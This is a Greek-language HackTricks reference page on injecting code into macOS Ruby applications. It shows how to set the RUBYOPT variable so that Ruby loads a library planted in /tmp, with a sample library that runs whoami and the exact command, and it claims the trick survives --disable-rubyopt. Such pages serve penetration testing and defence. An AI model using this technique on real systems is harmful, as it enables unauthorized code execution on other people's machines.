Greek - Ht
HackTricks Training Twitter Linkedin Sponsor

macOS Ruby Applications Injection

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

RUBYOPT

Χρησιμοποιώντας αυτήν τη μεταβλητή περιβάλλοντος, είναι δυνατόν να προστεθούν νέες παράμετροι στο ruby κάθε φορά που εκτελείται. Αν και η παράμετρος -e δεν μπορεί να χρησιμοποιηθεί για να καθορίσει κώδικα ruby προς εκτέλεση, είναι δυνατόν να χρησιμοποιηθούν οι παράμετροι -I και -r για να προστεθεί ένας νέος φάκελος στη διαδρομή φόρτωσης των βιβλιοθηκών και στη συνέχεια να καθοριστεί μια βιβλιοθήκη για φόρτωση.

Δημιουργήστε τη βιβλιοθήκη inject.rb στο /tmp:

inject.rb
puts `whoami`

Δημιουργήστε οπουδήποτε ένα ruby script όπως:

hello.rb
puts 'Hello, World!'

Στη συνέχεια, δημιουργήστε ένα αυθαίρετο ruby script και φορτώστε το με:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Ενδιαφέρον γεγονός, λειτουργεί ακόμα και με την παράμετρο --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

PreviousmacOS Python Applications InjectionNextmacOS .Net Applications Injection

Last updated